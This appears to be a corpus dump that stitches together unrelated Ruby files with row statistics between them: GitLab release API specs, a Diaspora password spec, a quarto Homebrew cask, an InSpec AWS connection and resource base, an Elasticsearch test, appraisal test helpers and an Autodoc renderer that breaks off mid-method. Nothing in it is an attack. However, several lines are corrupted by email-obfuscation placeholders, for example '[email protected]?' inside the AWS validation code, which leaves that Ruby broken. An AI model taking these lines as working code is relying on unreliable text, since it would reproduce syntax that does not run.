.to match_array(%w[https://dosuken.example.com/alpha.exe
https://dosuken.example.com/beta.exe])
end
context 'when link names are duplicates' do
let(:params) do
base_params.merge({
assets: {
links: [
{ name: 'alpha', url: 'https://dosuken.example.com/alpha.exe' },
{ name: 'alpha', url: 'https://dosuken.example.com/beta.exe' }
]
}
})
end
it 'recognizes as a bad request' do
post api("/projects/#{project.id}/releases", maintainer), params: params
expect(response).to have_gitlab_http_status(:bad_request)
end
end
end
end
end
context 'when using JOB-TOKEN auth' do
let(:job) { create(:ci_build, user: maintainer, project: project) }
let(:params) do
{
name: 'Another release',
tag_name: 'v0.2',
description: 'Another nice release',
released_at: '2019-04-25T10:00:00+09:00'
}
end
context 'when no token is provided' do
it 'returns a :not_found error' do
post api("/projects/#{project.id}/releases"), params: params
expect(response).to have_gitlab_http_status(:not_found)
end
end
context 'when an invalid token is provided' do
it 'returns an :unauthorized error' do
post api("/projects/#{project.id}/releases"), params: params.merge(job_token: 'yadayadayada')
expect(response).to have_gitlab_http_status(:unauthorized)
end
end
context 'when a valid token is provided' do
it 'creates the release for a running job' do
job.update!(status: :running)
post api("/projects/#{project.id}/releases"), params: params.merge(job_token: job.token)
expect(response).to have_gitlab_http_status(:created)
expect(project.releases.last.description).to eq('Another nice release')
end
it 'returns an :unauthorized error for a completed job' do
job.success!
post api("/projects/#{project.id}/releases"), params: params.merge(job_token: job.token)
expect(response).to have_gitlab_http_status(:unauthorized)
end
end
end
context 'when tag does not exist in git repository' do
let(:params) do
{
name: 'Android ~ Ice Cream Sandwich ~',
tag_name: tag_name,
description: 'Android 4.0–4.0.4 "Ice Cream Sandwich" is the ninth' \
'version of the Android mobile operating system developed' \
'by Google.',
ref: 'master'
}
end
let(:tag_name) { 'v4.0' }
it 'creates a new tag' do
expect do
post api("/projects/#{project.id}/releases", maintainer), params: params
end.to change { Project.find_by_id(project.id).repository.tag_count }.by(1)
expect(project.repository.find_tag('v4.0').dereferenced_target.id)
.to eq(project.repository.commit('master').id)
end
it 'creates a new release' do
expect do
post api("/projects/#{project.id}/releases", maintainer), params: params
end.to change { Release.count }.by(1)
expect(project.releases.last.name).to eq('Android ~ Ice Cream Sandwich ~')
expect(project.releases.last.tag).to eq('v4.0')
expect(project.releases.last.description).to eq(
'Android 4.0–4.0.4 "Ice Cream Sandwich" is the ninth' \
'version of the Android mobile operating system developed' \
'by Google.')
end
context 'when tag name is HEAD' do
let(:tag_name) { 'HEAD' }
it 'returns a 400 error as failure on tag creation' do
post api("/projects/#{project.id}/releases", maintainer), params: params
expect(response).to have_gitlab_http_status(:bad_request)
expect(json_response['message']).to eq('Tag name invalid')
end
end
context 'when tag name is empty' do
let(:tag_name) { '' }
it 'returns a 400 error as failure on tag creation' do
post api("/projects/#{project.id}/releases", maintainer), params: params
expect(response).to have_gitlab_http_status(:bad_request)
expect(json_response['message']).to eq('Tag name invalid')
end
end
end
context 'when release already exists' do
before do
create(:release, project: project, tag: 'v0.1', name: 'New release')
end
it 'returns an error as conflicted request' do
post api("/projects/#{project.id}/releases", maintainer), params: params
expect(response).to have_gitlab_http_status(:conflict)
end
end
context 'with milestones' do
let(:subject) { post api("/projects/#{project.id}/releases", maintainer), params: params }
let(:milestone) { create(:milestone, project: project, title: 'v1.0') }
let(:returned_milestones) { json_response['milestones'].map {|m| m['title']} }
before do
params.merge!(milestone_params)
subject
end
context 'with a project milestone' do
let(:milestone_params) { { milestones: [milestone.title] } }
it 'adds the milestone' do
expect(response).to have_gitlab_http_status(:created)
expect(returned_milestones).to match_array(['v1.0'])
end
end
context 'with multiple milestones' do
let(:milestone2) { create(:milestone, project: project, title: 'm2') }
let(:milestone_params) { { milestones: [milestone.title, milestone2.title] } }
it 'adds all milestones' do
expect(response).to have_gitlab_http_status(:created)
expect(returned_milestones).to match_array(['v1.0', 'm2'])
end
end
context 'with an empty milestone' do
let(:milestone_params) { { milestones: [] } }
it 'removes all milestones' do
expect(response).to have_gitlab_http_status(:created)
expect(json_response['milestones']).to be_nil
end
end
context 'with a non-existant milestone' do
let(:milestone_params) { { milestones: ['xyz'] } }
it 'returns a 400 error as milestone not found' do
expect(response).to have_gitlab_http_status(:bad_request)
expect(json_response['message']).to eq("Milestone(s) not found: xyz")
end
end
context 'with a milestone from a different project' do
let(:milestone) { create(:milestone, title: 'v1.0') }
let(:milestone_params) { { milestones: [milestone.title] } }
it 'returns a 400 error as milestone not found' do
expect(response).to have_gitlab_http_status(:bad_request)
expect(json_response['message']).to eq("Milestone(s) not found: v1.0")
end
end
end
end
describe 'PUT /projects/:id/releases/:tag_name' do
let(:params) { { description: 'Best release ever!' } }
let!(:release) do
create(:release,
project: project,
tag: 'v0.1',
name: 'New release',
released_at: '2018-03-01T22:00:00Z',
description: 'Super nice release')
end
before do
initialize_tags
end
it 'accepts the request' do
put api("/projects/#{project.id}/releases/v0.1", maintainer), params: params
expect(response).to have_gitlab_http_status(:ok)
end
it 'updates the description' do
put api("/projects/#{project.id}/releases/v0.1", maintainer), params: params
expect(project.releases.last.description).to eq('Best release ever!')
end
it 'does not change other attributes' do
put api("/projects/#{project.id}/releases/v0.1", maintainer), params: params
expect(project.releases.last.tag).to eq('v0.1')
expect(project.releases.last.name).to eq('New release')
expect(project.releases.last.released_at).to eq('2018-03-01T22:00:00Z')
end
it 'matches response schema' do
put api("/projects/#{project.id}/releases/v0.1", maintainer), params: params
expect(response).to match_response_schema('public_api/v4/release')
end
it 'updates released_at' do
params = { released_at: '2015-10-10T05:00:00Z' }
put api("/projects/#{project.id}/releases/v0.1", maintainer), params: params
expect(project.releases.last.released_at).to eq('2015-10-10T05:00:00Z')
end
context 'with protected tag' do
context 'when user has access to the protected tag' do
let!(:protected_tag) { create(:protected_tag, :developers_can_create, name: '*', project: project) }
it 'accepts the request' do
put api("/projects/#{project.id}/releases/v0.1", developer), params: params
expect(response).to have_gitlab_http_status(:ok)
end
end
context 'when user does not have access to the protected tag' do
let!(:protected_tag) { create(:protected_tag, :maintainers_can_create, name: '*', project: project) }
it 'forbids the request' do
put api("/projects/#{project.id}/releases/v0.1", developer), params: params
expect(response).to have_gitlab_http_status(:forbidden)
end
end
end
context 'when user tries to update sha' do
let(:params) { { sha: 'xxx' } }
it 'does not allow the request' do
put api("/projects/#{project.id}/releases/v0.1", maintainer), params: params
expect(response).to have_gitlab_http_status(:bad_request)
end
end
context 'when params is empty' do
let(:params) { {} }
it 'does not allow the request' do
put api("/projects/#{project.id}/releases/v0.1", maintainer), params: params
expect(response).to have_gitlab_http_status(:bad_request)
end
end
context 'when there are no corresponding releases' do
let!(:release) { }
it 'forbids the request' do
put api("/projects/#{project.id}/releases/v0.1", maintainer), params: params
expect(response).to have_gitlab_http_status(:forbidden)
end
end
context 'when user is a reporter' do
it 'forbids the request' do
put api("/projects/#{project.id}/releases/v0.1", reporter), params: params
expect(response).to have_gitlab_http_status(:forbidden)
end
end
context 'when user is not a project member' do
it 'forbids the request' do
put api("/projects/#{project.id}/releases/v0.1", non_project_member),
params: params
expect(response).to have_gitlab_http_status(:not_found)
end
context 'when project is public' do
let(:project) { create(:project, :repository, :public) }
it 'forbids the request' do
put api("/projects/#{project.id}/releases/v0.1", non_project_member),
params: params
expect(response).to have_gitlab_http_status(:forbidden)
end
end
end
context 'with milestones' do
let(:returned_milestones) { json_response['milestones'].map {|m| m['title']} }
subject { put api("/projects/#{project.id}/releases/v0.1", maintainer), params: params }
context 'when a milestone is passed in' do
let(:milestone) { create(:milestone, project: project, title: 'v1.0') }
let(:milestone_title) { milestone.title }
let(:params) { { milestones: [milestone_title] } }
before do
release.milestones << milestone
end
context 'a different milestone' do
let(:milestone_title) { 'v2.0' }
let!(:milestone2) { create(:milestone, project: project, title: milestone_title) }
it 'replaces the milestone' do
subject
expect(response).to have_gitlab_http_status(:ok)
expect(returned_milestones).to match_array(['v2.0'])
end
end
context 'an identical milestone' do
let(:milestone_title) { 'v1.0' }
it 'does not change the milestone' do
subject
expect(response).to have_gitlab_http_status(:ok)
expect(returned_milestones).to match_array(['v1.0'])
end
end
context 'an empty milestone' do
let(:milestone_title) { nil }
it 'removes the milestone' do
subject
expect(response).to have_gitlab_http_status(:ok)
expect(json_response['milestones']).to be_nil
end
end
context 'without milestones parameter' do
let(:params) { { name: 'some new name' } }
it 'does not change the milestone' do
subject
expect(response).to have_gitlab_http_status(:ok)
expect(returned_milestones).to match_array(['v1.0'])
end
end
context 'multiple milestones' do
context 'with one new' do
let!(:milestone2) { create(:milestone, project: project, title: 'milestone2') }
let(:params) { { milestones: [milestone.title, milestone2.title] } }
it 'adds the new milestone' do
subject
expect(response).to have_gitlab_http_status(:ok)
expect(returned_milestones).to match_array(['v1.0', 'milestone2'])
end
end
context 'with all new' do
let!(:milestone2) { create(:milestone, project: project, title: 'milestone2') }
let!(:milestone3) { create(:milestone, project: project, title: 'milestone3') }
let(:params) { { milestones: [milestone2.title, milestone3.title] } }
it 'replaces the milestones' do
subject
expect(response).to have_gitlab_http_status(:ok)
expect(returned_milestones).to match_array(%w(milestone2 milestone3))
end
end
end
end
end
end
describe 'DELETE /projects/:id/releases/:tag_name' do
let!(:release) do
create(:release,
project: project,
tag: 'v0.1',
name: 'New release',
description: 'Super nice release')
end
it 'accepts the request' do
delete api("/projects/#{project.id}/releases/v0.1", maintainer)
expect(response).to have_gitlab_http_status(:ok)
end
it 'destroys the release' do
expect do
delete api("/projects/#{project.id}/releases/v0.1", maintainer)
end.to change { Release.count }.by(-1)
end
it 'does not remove a tag in repository' do
expect do
delete api("/projects/#{project.id}/releases/v0.1", maintainer)
end.not_to change { Project.find_by_id(project.id).repository.tag_count }
end
it 'matches response schema' do
delete api("/projects/#{project.id}/releases/v0.1", maintainer)
expect(response).to match_response_schema('public_api/v4/release')
end
context 'with protected tag' do
context 'when user has access to the protected tag' do
let!(:protected_tag) { create(:protected_tag, :developers_can_create, name: '*', project: project) }
it 'accepts the request' do
delete api("/projects/#{project.id}/releases/v0.1", developer)
expect(response).to have_gitlab_http_status(:ok)
end
end
context 'when user does not have access to the protected tag' do
let!(:protected_tag) { create(:protected_tag, :maintainers_can_create, name: '*', project: project) }
it 'forbids the request' do
delete api("/projects/#{project.id}/releases/v0.1", developer)
expect(response).to have_gitlab_http_status(:forbidden)
end
end
end
context 'when there are no corresponding releases' do
let!(:release) { }
it 'forbids the request' do
delete api("/projects/#{project.id}/releases/v0.1", maintainer)
expect(response).to have_gitlab_http_status(:forbidden)
end
end
context 'when user is a reporter' do
it 'forbids the request' do
delete api("/projects/#{project.id}/releases/v0.1", reporter)
expect(response).to have_gitlab_http_status(:forbidden)
end
end
context 'when user is not a project member' do
it 'forbids the request' do
delete api("/projects/#{project.id}/releases/v0.1", non_project_member)
expect(response).to have_gitlab_http_status(:not_found)
end
context 'when project is public' do
let(:project) { create(:project, :repository, :public) }
it 'forbids the request' do
delete api("/projects/#{project.id}/releases/v0.1", non_project_member)
expect(response).to have_gitlab_http_status(:forbidden)
end
end
end
end
describe 'Track API events', :snowplow do
context 'when tracking event with labels from User-Agent' do
it 'adds the tracked User-Agent to the label of the tracked event' do
get api("/projects/#{project.id}/releases", maintainer), headers: { 'User-Agent' => described_class::RELEASE_CLI_USER_AGENT }
assert_snowplow_event('get_releases', true)
end
it 'skips label when User-Agent is invalid' do
get api("/projects/#{project.id}/releases", maintainer), headers: { 'User-Agent' => 'invalid_user_agent' }
assert_snowplow_event('get_releases', false)
end
end
end
def initialize_tags
project.repository.add_tag(maintainer, 'v0.1', commit.id)
project.repository.add_tag(maintainer, 'v0.2', commit.id)
end
def assert_snowplow_event(action, release_cli, user = maintainer)
expect_snowplow_event(
category: described_class.name,
action: action,
project: project,
user: user,
release_cli: release_cli
)
end
end
| 34.292481 | 152 | 0.613651 |
e20e83bafdd6e116dc7120db514e57fe5a347385 | 1,481 | # Copyright (c) 2010-2011, Diaspora Inc. This file is
# licensed under the Affero General Public License version 3 or later. See
# the COPYRIGHT file.
require 'spec_helper'
describe Devise::PasswordsController do
include Devise::TestHelpers
before do
@request.env["devise.mapping"] = Devise.mappings[:user]
end
describe "#create" do
context "when there is no such user" do
it "succeeds" do
post :create, "user" => {"email" => "[email protected]"}
response.should be_success
end
it "doesn't send email" do
expect {
post :create, "user" => {"email" => "[email protected]"}
}.to change(Devise.mailer.deliveries, :length).by(0)
end
end
context "when there is a user with that email" do
it "redirects to the login page" do
post :create, "user" => {"email" => alice.email}
response.should redirect_to(new_user_session_path)
end
it "sends email" do
expect {
post :create, "user" => {"email" => alice.email}
}.to change(Devise.mailer.deliveries, :length).by(1)
end
it "sends email with a non-blank body" do
post :create, "user" => {"email" => alice.email}
email = Devise.mailer.deliveries.last
email_body = email.body.to_s
email_body = email.html_part.body.raw_source if email_body.blank? && email.html_part.present?
email_body.should_not be_blank
end
end
end
end | 32.911111 | 101 | 0.625928 |
e96d4c631b65c0d66f2d0901bb5e903c0a1f2bc3 | 358 | require_relative 'cuda_model'
require_relative 'gen_probe_base.rb'
provider = :lttng_ust_cuda
puts <<EOF
#define __CUDA_API_VERSION_INTERNAL 1
#include <cuda.h>
EOF
$cuda_commands.each { |c|
next if c.parameters && c.parameters.length > LTTNG_USABLE_PARAMS
$tracepoint_lambda.call(provider, c, :start)
$tracepoint_lambda.call(provider, c, :stop)
}
| 21.058824 | 67 | 0.77095 |
e92cfb66fe02b7155ffec8ff6d02b7713ba5131c | 11,709 | # frozen_string_literal: true
require 'aws-sdk-autoscaling'
require 'aws-sdk-cloudtrail'
require 'aws-sdk-cloudwatch'
require 'aws-sdk-cloudwatchlogs'
require 'aws-sdk-configservice'
require 'aws-sdk-core'
require 'aws-sdk-ec2'
require 'aws-sdk-ecs'
require 'aws-sdk-eks'
require 'aws-sdk-elasticloadbalancing'
require 'aws-sdk-iam'
require 'aws-sdk-kms'
require 'aws-sdk-organizations'
require 'aws-sdk-rds'
require 'aws-sdk-s3'
require 'aws-sdk-sns'
require 'aws-sdk-sqs'
require 'rspec/expectations'
# AWS Inspec Backend Classes
#
# Class to manage the AWS connection, instantiates all required clients for inspec resources
#
class AwsConnection
def initialize(params)
params = {} if params.nil?
# Special case for AWS, let's allow all resources to specify parameters that propagate to the client init
# This can be useful for e.g.
# https://docs.aws.amazon.com/sdk-for-ruby/v3/developer-guide/stubbing.html
# https://docs.aws.amazon.com/sdk-for-ruby/v3/developer-guide/setup-config.html#aws-ruby-sdk-setting-non-standard-endpoint
if params.is_a?(Hash)
@client_args = params.fetch(:client_args, nil)
end
@cache = {}
end
def aws_client(klass)
# TODO: make this a dict with keys of klass.to_s.to_sym such that we can send different args per client in cases such as EC2 instance that use multiple different clients
return @cache[klass.to_s.to_sym] ||= klass.new(@client_args) if @client_args
@cache[klass.to_s.to_sym] ||= klass.new
end
def aws_resource(klass, args)
return klass.new(args, @client_args) if @client_args
klass.new(args)
end
def unique_identifier
# use aws account id
client = aws_client(::Aws::STS::Client)
client.get_caller_identity.account
end
# SDK Client convenience methods
def cloudtrail_client
aws_client(Aws::CloudTrail::Client)
end
def cloudwatch_client
aws_client(Aws::CloudWatch::Client)
end
def cloudwatchlogs_client
aws_client(Aws::CloudWatchLogs::Client)
end
def compute_client
aws_client(Aws::EC2::Client)
end
def config_client
aws_client(Aws::ConfigService::Client)
end
def ecs_client
aws_client(Aws::ECS::Client)
end
def eks_client
aws_client(Aws::EKS::Client)
end
def elb_client
aws_client(Aws::ElasticLoadBalancing::Client)
end
def iam_client
aws_client(Aws::IAM::Client)
end
def kms_client
aws_client(Aws::KMS::Client)
end
def org_client
aws_client(Aws::Organizations::Client)
end
def rds_client
aws_client(Aws::RDS::Client)
end
def service_client
aws_client(Aws::AutoScaling::Client)
end
def sqs_client
aws_client(Aws::SQS::Client)
end
def sns_client
aws_client(Aws::SNS::Client)
end
def storage_client
aws_client(Aws::S3::Client)
end
def sts_client
aws_client(Aws::STS::Client)
end
end
# Base class for AWS resources
#
class AwsResourceBase < Inspec.resource(1)
attr_reader :opts, :aws
def initialize(opts)
@opts = opts
# ensure we have a AWS connection, resources can choose which of the clients to instantiate
client_args = { client_args: {} }
if opts.is_a?(Hash)
# below allows each resource to optionally and conveniently set a region
client_args[:client_args][:region] = opts[:aws_region] if opts[:aws_region]
# below allows each resource to optionally and conveniently set an endpoint
client_args[:client_args][:endpoint] = opts[:aws_endpoint] if opts[:aws_endpoint]
# this catches the stub_data true option for unit testing - and others that could be useful for consumers
client_args[:client_args].update(opts[:client_args]) if opts[:client_args]
end
@aws = AwsConnection.new(client_args)
# N.B. if/when we migrate AwsConnection to train, can update above and inject args via:
# inspec.backend.aws_client(Aws::EC2::Resource,opts)
# inspec.backend.aws_resource(Aws::EC2::Resource,opts)
# However, for the unit testing case, would potentially have to instantiate the client ourselves...
# here we might want to inject stub data for testing, let's use an option for that
return if !defined?(@opts.keys) || [email protected]?(:stub_data)
raise ArgumentError, 'Expected stub data to be an array' if !opts[:stub_data].is_a?(Array)
opts[:stub_data].each do |stub|
raise ArgumentError, 'Expect each stub_data hash to have :client, :method and :data keys' if !stub.keys.all? { |a| %i(method data client).include?(a) }
@aws.aws_client(stub[:client]).stub_responses(stub[:method], stub[:data])
end
end
def validate_parameters(allowed_list)
allowed_list += %i(client_args stub_data aws_region aws_endpoint)
raise ArgumentError, 'Scalar arguments not supported' if !defined?(@opts.keys)
raise ArgumentError, 'Unexpected arguments found' if [email protected]? { |a| allowed_list.include?(a) }
raise ArgumentError, 'Provided parameter should not be empty' if [email protected]? { |a| !a.empty? }
true
end
def failed_resource?
@failed_resource
end
# Intercept AWS exceptions
def catch_aws_errors
yield # Catch and create custom messages as needed
rescue Aws::Errors::MissingCredentialsError
Inspec::Log.error 'It appears that you have not set your AWS credentials. See https://www.inspec.io/docs/reference/platforms for details.'
fail_resource('No AWS credentials available')
rescue Aws::Errors::ServiceError => e
if is_permissions_error(e)
advice = ''
error_type = e.class.to_s.split('::').last
if error_type == 'InvalidAccessKeyId'
advice = 'Please ensure your AWS Access Key ID is set correctly.'
elsif error_type == 'AccessDenied'
advice = 'Please check the IAM permissions required for this Resource in the documentation, ' \
'and ensure your Service Principal has these permissions set.'
end
fail_resource("Unable to execute control: #{e.message}\n#{advice}")
else
Inspec::Log.warn "AWS Service Error encountered running a control with Resource #{@__resource_name__}. " \
"Error message: #{e.message}. You should address this error to ensure your controls are " \
'behaving as expected.'
@failed_resource = true
nil
end
end
def create_resource_methods(object)
dm = AwsResourceDynamicMethods.new
dm.create_methods(self, object)
end
# Each client has its own variation of Aws::*::Errors::AccessDenied, making the checking cumbersome and flaky.
# Checking the status code is more reliable.
def is_permissions_error(error)
true if error.context.http_response.status_code == 403
end
def map_tags(tag_list)
return {} if tag_list.nil? || tag_list.empty?
tags = {}
tag_list.each do |tag|
tags[tag[:key]] = tag[:value]
end
tags
end
end
# Class to create methods on the calling object at run time. Heavily based on the Azure Inspec resources.
#
class AwsResourceDynamicMethods
# Given the calling object and its data, create the methods on the object according
# to the data that has been retrieved. Various types of data can be returned so the method
# checks the type to ensure that the necessary methods are configured correctly
#
# @param object The object on which the methods should be created
# @param data The data from which the methods should be created
def create_methods(object, data)
# Check the type of data as this affects the setup of the methods
# If it is an Aws Generic Resource then setup methods for each of
# the instance variables
case data.class.to_s
when /Aws::.*/
# iterate around the instance variables
data.instance_variables.each do |var|
create_method(object, var.to_s.delete('@'), data.instance_variable_get(var))
end
# When the data is a Hash object iterate around each of the key value pairs and
# craete a method for each one.
when 'Hash'
data.each do |key, value|
create_method(object, key, value)
end
end
end
private
# Method that is responsible for creating the method on the calling object. This is
# because some nesting maybe required. For example of the value is a Hash then it will
# need to have an AwsResourceProbe create for each key, whereas if it is a simple
# string then the value just needs to be returned
#
def create_method(object, name, value)
# Create the necessary method based on the var that has been passed
# Test the value for its type so that the method can be setup correctly
case value.class.to_s
when 'String', 'Integer', 'TrueClass', 'FalseClass', 'Fixnum'
object.define_singleton_method name do
value
end
when 'Hash'
value.count.zero? ? return_value = value : return_value = AwsResourceProbe.new(value)
object.define_singleton_method name do
return_value
end
# there are nested AWS API classes throughout
when /Aws::.*/
object.define_singleton_method name do
value = value.to_h if value.respond_to? :to_h
AwsResourceProbe.new(value)
end
when 'Array'
# Some things are just string or integer arrays
# Check this by seeing if the first element is a string / integer / boolean or
# a hashtable
# This may not be the best method, but short of testing all elements in the array, this is
# the quickest test
# p value[0].class.to_s
case value[0].class.to_s
when 'String', 'Integer', 'TrueClass', 'FalseClass', 'Fixnum'
probes = value
else
if name.eql?(:tags)
probes = {}
value.each do |tag|
probes[tag[:key]] = tag[:value]
end
else
probes = []
value.each do |value_item|
value_item = value_item.to_h if value_item.respond_to? :to_h
probes << AwsResourceProbe.new(value_item)
end
end
end
object.define_singleton_method name do
probes
end
end
end
end
# Class object that is created for each element that is returned by GCP.
# This is what is interrogated by InSpec. If they are nested hashes, then this results
# in nested AwsResourceProbe objects.
#
# The methods for each of the classes are dynamically defined at run time and will
# match the items that are retrieved from GCP. See the 'test/integration/verify/controls' for
# examples
#
class AwsResourceProbe
attr_reader :name, :type, :location, :item, :count
# Initialize method for the class. Accepts an item, be it a scalar value, hash or GCP object
# It will then create the necessary dynamic methods so that they can be called in the tests
# This is accomplished by call the AwsResourceDynamicMethods
#
# @param item The item from which the class will be initialized
#
# @return AwsResourceProbe
def initialize(item)
dm = AwsResourceDynamicMethods.new
dm.create_methods(self, item)
# Set the item as a property on the class
# This is so that it is possible to interrogate what has been added to the class and isolate them from
# the standard methods that a Ruby class has.
# This used for checking Tags on a resource for example
# It also allows direct access if so required
@item = item
# Set how many items have been set
@count = item.length if item.respond_to? :length
end
# Allows resources to respond to the include test
# This means that things like tags can be checked for and then their value tested
#
# @param [String] key Name of the item to look for in the @item property
def include?(key)
@item.key?(key)
end
end
| 34.037791 | 173 | 0.702024 |
e9779b68e1c9385cd7ed643ecd52a2884a2f1e9b | 1,975 | require 'test_helper'
module Elasticsearch
module Test
class IndicesSegmentsTest < ::Test::Unit::TestCase
context "Indices: Segments" do
subject { FakeClient.new }
should "perform correct request" do
subject.expects(:perform_request).with do |method, url, params, body|
assert_equal 'GET', method
assert_equal '_segments', url
assert_equal Hash.new, params
assert_nil body
true
end.returns(FakeResponse.new)
subject.indices.segments
end
should "perform request against an index" do
subject.expects(:perform_request).with do |method, url, params, body|
assert_equal 'foo/_segments', url
true
end.returns(FakeResponse.new)
subject.indices.segments :index => 'foo'
end
should "perform request against multiple indices" do
subject.expects(:perform_request).with do |method, url, params, body|
assert_equal 'foo,bar/_segments', url
true
end.returns(FakeResponse.new).twice
subject.indices.segments :index => ['foo','bar']
subject.indices.segments :index => 'foo,bar'
end
should "pass the URL parameters" do
subject.expects(:perform_request).with do |method, url, params, body|
assert_equal 'foo,bar/_segments', url
assert_equal 'missing', params[:ignore_indices]
true
end.returns(FakeResponse.new)
subject.indices.segments :index => ['foo','bar'], :ignore_indices => 'missing'
end
should "URL-escape the parts" do
subject.expects(:perform_request).with do |method, url, params, body|
assert_equal 'foo%5Ebar/_segments', url
true
end.returns(FakeResponse.new)
subject.indices.segments :index => 'foo^bar'
end
end
end
end
end
| 30.384615 | 88 | 0.601013 |
0889033412081d5a0acfad4346e4c47c03832dfb | 3,883 | require 'rspec/expectations/expectation_target'
require 'active_support/core_ext/string/strip'
require 'active_support/core_ext/string/filters'
require 'active_support/concern'
require 'appraisal/utils'
require "./spec/support/dependency_helpers"
module AcceptanceTestHelpers
extend ActiveSupport::Concern
include DependencyHelpers
BUNDLER_ENVIRONMENT_VARIABLES = %w(RUBYOPT BUNDLE_PATH BUNDLE_BIN_PATH
BUNDLE_GEMFILE)
included do
metadata[:type] = :acceptance
before :parallel => true do
unless Appraisal::Utils.support_parallel_installation?
pending 'This Bundler version does not support --jobs flag.'
end
end
before do
cleanup_artifacts
save_environment_variables
unset_bundler_environment_variables
build_default_dummy_gems
ensure_bundler_is_available
add_binstub_path
build_default_gemfile
end
after do
restore_environment_variables
end
end
def save_environment_variables
@original_environment_variables = {}
(BUNDLER_ENVIRONMENT_VARIABLES + %w(PATH)).each do |key|
@original_environment_variables[key] = ENV[key]
end
end
def unset_bundler_environment_variables
BUNDLER_ENVIRONMENT_VARIABLES.each do |key|
ENV[key] = nil
end
end
def add_binstub_path
ENV['PATH'] = "bin:#{ENV['PATH']}"
end
def restore_environment_variables
@original_environment_variables.each_pair do |key, value|
ENV[key] = value
end
end
def build_appraisal_file(content)
write_file 'Appraisals', content.strip_heredoc
end
def build_gemfile(content)
write_file 'Gemfile', content.strip_heredoc
end
def add_gemspec_to_gemfile
in_test_directory do
File.open('Gemfile', 'a') { |file| file.puts 'gemspec' }
end
end
def build_gemspec
write_file "stage.gemspec", <<-gemspec
Gem::Specification.new do |s|
s.name = 'stage'
s.version = '0.1'
s.summary = 'Awesome Gem!'
s.authors = "Appraisal"
end
gemspec
end
def content_of(path)
file(path).read.tap do |content|
content.gsub!(/(\S+): /, ":\\1 => ")
end
end
def file(path)
Pathname.new(current_directory) + path
end
def be_exists
be_exist
end
private
def current_directory
File.expand_path('tmp/stage')
end
def write_file(filename, content)
in_test_directory { File.open(filename, 'w') { |file| file.puts content } }
end
def cleanup_artifacts
FileUtils.rm_rf current_directory
end
def build_default_dummy_gems
FileUtils.mkdir_p(TMP_GEM_ROOT)
build_gem 'dummy', '1.0.0'
build_gem 'dummy', '1.1.0'
end
def ensure_bundler_is_available
run "bundle -v 2>&1", false
if $?.exitstatus != 0
puts <<-WARNING.squish.strip_heredoc
Reinstall Bundler to #{TMP_GEM_ROOT} as `BUNDLE_DISABLE_SHARED_GEMS`
is enabled.
WARNING
version = Utils.bundler_version
run "gem install bundler --version #{version} --install-dir '#{TMP_GEM_ROOT}'"
end
end
def build_default_gemfile
build_gemfile <<-Gemfile
source 'https://rubygems.org'
gem 'appraisal', :path => '#{PROJECT_ROOT}'
Gemfile
run "bundle install --binstubs --local"
end
def in_test_directory(&block)
FileUtils.mkdir_p current_directory
Dir.chdir current_directory, &block
end
def run(command, raise_on_error = true)
in_test_directory do
`#{command}`.tap do |output|
exitstatus = $?.exitstatus
if ENV["VERBOSE"]
puts output
end
if raise_on_error && exitstatus != 0
raise RuntimeError, <<-error_message.strip_heredoc
Command #{command.inspect} exited with status #{exitstatus}. Output:
#{output.gsub(/^/, ' ')}
error_message
end
end
end
end
end
| 22.707602 | 84 | 0.677311 |
3849e341fefe9d6961cabcd20a7ec39f43e48660 | 557 | cask "quarto" do
version "0.9.449"
sha256 "080dbaafbb1426b28354ed6e50f735d87e4ec45c4c8dbdd029281f9d7b319bf5"
url "https://github.com/quarto-dev/quarto-cli/releases/download/v#{version}/quarto-#{version}-macos.pkg",
verified: "github.com/quarto-dev/quarto-cli/"
name "quarto"
desc "Scientific and technical publishing system built on Pandoc"
homepage "https://www.quarto.org/"
depends_on macos: ">= :el_capitan"
pkg "quarto-#{version}-macos.pkg"
uninstall pkgutil: "org.rstudio.quarto"
zap trash: "~/Library/Caches/quarto"
end
| 29.315789 | 107 | 0.736086 |
3893e89f59c365a03d10073945ae1db8eac69352 | 6,723 | require "action_dispatch/http/request"
require "active_support/core_ext/hash/slice"
require "active_support/core_ext/string/strip"
require "uri"
require "erb"
require "pathname"
module Autodoc
class Document
DEFAULT_DOCUMENT_PATH_FROM_EXAMPLE = ->(example) do
example.file_path.gsub(%r<\./spec/[^/]+/(.+)_spec\.rb>, '\1.md')
end
def self.render(*args)
new(*args).render
end
def initialize(context, example)
@context = context
@example = example
end
def pathname
@pathname ||= begin
Autodoc.configuration.pathname + document_path_from_example.call(example)
end
end
def render
ERB.new(Autodoc.configuration.template, nil, "-").result(binding)
end
def title
"#{method} #{path}"
end
def identifier
title.gsub(" ", "-").gsub(/[:\/]/, "").downcase
end
private
def document_path_from_example
Autodoc.configuration.document_path_from_example || DEFAULT_DOCUMENT_PATH_FROM_EXAMPLE
end
def example
if ::RSpec::Core::Version::STRING.match(/\A(?:3\.|2.99\.)/)
@example
else
@context.example
end
end
def request
@request ||= begin
if using_rack_test?
ActionDispatch::Request.new(@context.last_request.env)
else
@context.request
end
end
end
def response
@response ||= begin
if using_rack_test?
@context.last_response
else
@context.response
end
end
end
def method
request.request_method
end
def request_header
table = request_header_from_fixed_keys
table.merge!(request_header_from_http_prefix)
table.reject! {|key, value| value.blank? }
table = Hash[table.map {|key, value| [key.split(?_).map(&:downcase).map(&:camelize).join(?-), value] }]
table.except!(*Autodoc.configuration.suppressed_request_header)
table.map {|key, value| [key, value].join(": ") }.sort.join("\n")
end
def request_header_from_http_prefix
request.headers.inject({}) do |table, (key, value)|
if key.start_with?("HTTP_")
table.merge(key.gsub(/^HTTP_/, "") => value)
else
table
end
end
end
def request_header_from_fixed_keys
table = request.headers
table = table.env if table.respond_to?(:env)
table.slice("CONTENT_TYPE", "CONTENT_LENGTH", "LOCATION")
end
def request_http_version
request.env["HTTP_VERSION"] || "HTTP/1.1"
end
def request_query
"?#{URI.unescape(request.query_string.force_encoding(Encoding::UTF_8))}" unless request.query_string.empty?
end
def request_body_section
"\n\n#{request_body}" if request_body.present?
end
def request_body
if instance_variable_defined?(:@request_body)
@request_body
else
@request_body = begin
case
when request.try(:content_type) == "multipart/form-data"
"multipart/form-data"
when request.headers["Content-Type"].try(:include?, "application/json")
request_body_parsed_as_json
else
request.body.string
end
end
end
end
def request_body_parsed_as_json
JSON.pretty_generate(JSON.parse(request.body.string))
rescue JSON::ParserError
end
def response_header
table = response.headers.clone
table = table.to_hash if table.respond_to?(:to_hash)
table.except!(*Autodoc.configuration.suppressed_response_header)
table.map {|key, value| [key, value].join(": ") }.sort.join("\n")
end
def response_http_version
response.header["HTTP_VERSION"] || "HTTP/1.1"
end
def response_body_section
"\n\n#{response_body}" if response_body.present?
end
def response_body
